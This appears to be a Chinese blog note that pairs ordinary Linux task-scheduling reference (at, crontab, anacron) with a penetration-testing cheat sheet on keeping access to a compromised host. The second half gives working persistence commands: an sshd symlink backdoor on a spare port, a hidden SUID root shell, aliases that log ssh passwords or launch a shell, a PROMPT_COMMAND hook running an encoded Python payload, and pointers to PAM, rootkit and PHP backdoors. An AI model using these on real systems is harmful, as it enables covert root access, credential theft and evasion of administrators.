一、Linux计划任务
at命令(一次性执行任务) > atd进程
1.服务开启: service atd start
2.基本格式: at [HH:MM] [yyyy-mm-dd] #没有指定年月日的,默认是当天的。
3.查询当前设置的at任务列表: atq 或at -l
4.删除指定任务编号的at任务: atrm 编号 或at -d
5.查看计划任务的具体内容: at -c 任务号
6.使用文件中的命令作为计划任务(比较少用): at 时间 -f 文件
7.相关文件: /etc/at.deny #该名单里面的人不可以使用,/etc/at.allow #只有该名单里面的人可以使用
crontab命令(周期性执行任务)> crond进程
注意事项
-
crontab 只会在/sbin、/bin、/usr/sbin、/usr/bin下查找命令,其他目录要使用绝对路径。
-
只有root用户可以管理其他用户的周期性任务
-
crontab在重启后之前的周期性任务无效,anacron可以弥补crontab的缺陷。配置文件:/etc/anacrontab。
anacrontab会开机自动检查未执行计划任务并逐一执行,且该过程是用户透明的。一般而言crontab基本够用
基本用法
1.服务开启:service crond start
2.编辑计划任务:crontab -e -u 用户名
3.查看计划任务:crontab -l -u 用户名
4.删除计划任务:crontab -r -u 用户名
#相关文件:
/var/spool/cron/用户名 #用户定义的设置
/var/log/cron #cron服务的日志文件
/etc/crontab #cron服务配置文件:
anacron
简介
anacron不同于crontab,其只精确到天,以弥补服务器在宕机下crond调度不周,或缓解计划任务执行过于集中的问题。
它需记录上次执行的时间,并更新到相应的/var/spool/anacron目录下,下次执行时会与上次记录时间作对比
如果满足大于/etc/anacron的配置的天数就会立即执行相应的命令,然后刷新时间。
基本参数
-t: 配置文件路径,让anacron从指定配置文件中读取配置,常用于普通用户来管理个人任务
-S:spooldir,设定新的spool目录来记录任务执行的时间戳,常用于普通用户来管理个人任务
-T:测试配置文件是否正确
-f:强制执行所有的任务,而不管之前的执行日期是否超过轮回天数
-u:将所有任务的执行日期都更新为当前日期,而不真正的执行任务
-s:串行地执行任务,只有前一个任务完成后才开始下一个任务
二、其他
sshd软连接
victim:ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -o Port=5555;
attack:ssh root@x.x.x.x -p 5555
SUID Shell
root 权限下执行如下命令,普通用户运行/dev/.rootshell即可获得root权限
cp /bin/bash /dev/.rootshell
chmod u+s /dev/.rootshell
alias
通过alias来指定执行特定的命令时候静默运行其他程序,从而达到启动后门,记录键值等作用
1. 修改ssh命令,利用strace,使其具有记录ssh对read,write,connect调用的功能。
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
2.利用守护进程回弹shell
alias cat='cat&&/root/.shell' (shell自己写)
PAM密码记录后门
pam是一种认证机制,它可帮助管理员快速方便地配置认证方式,并且无需更改服务程序。
该后门主要通过pam_unix_auth.c打补丁的方式潜入到正常pam模块,记录管理员的帐号密码。
过程:Linux 安全之pam后门_[Redkey]_记录学习点滴…的技术博客_51CTO博客
PROMPT_COMMAND后门
原理
bash提供了一个环境变量PROMPT_COMMAND,这个变量会在你执行命令前执行一遍。
payload export PROMPT_COMMAND="lsof -i:1025 &>/dev/null || (python -c "exec('encoded_payload'.decode('base64'))" 2>/dev/null &)”
PROMPT_COMMAND还可以提权
ssh 公钥免密(易被发现)
生成rsa公钥:ssh-keygen -t rsa
把id_rsa.pub写入服务端的/home/[用户名]/.ssh/authorized_keys中:
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
rootkit后门
https://github.com/d30sa1/RootKits-List-Download
php backdoor
Linux:https://micropoor.blogspot.com/2018/05/php-all-kernel-versions-for-backdoor.html
Windows:https://micropoor.blogspot.com/2018/05/php-backdoor-for-windows.html
References
原文:渗透之权限维持杂谈 - linuxsec - 博客园渗透之权限维持杂谈 - linuxsec - 博客园渗透之权限维持杂谈 - linuxsec - 博客园
linux后门集合:我所了解的渗透测试——Linux后门类型 - 安全客,安全资讯平台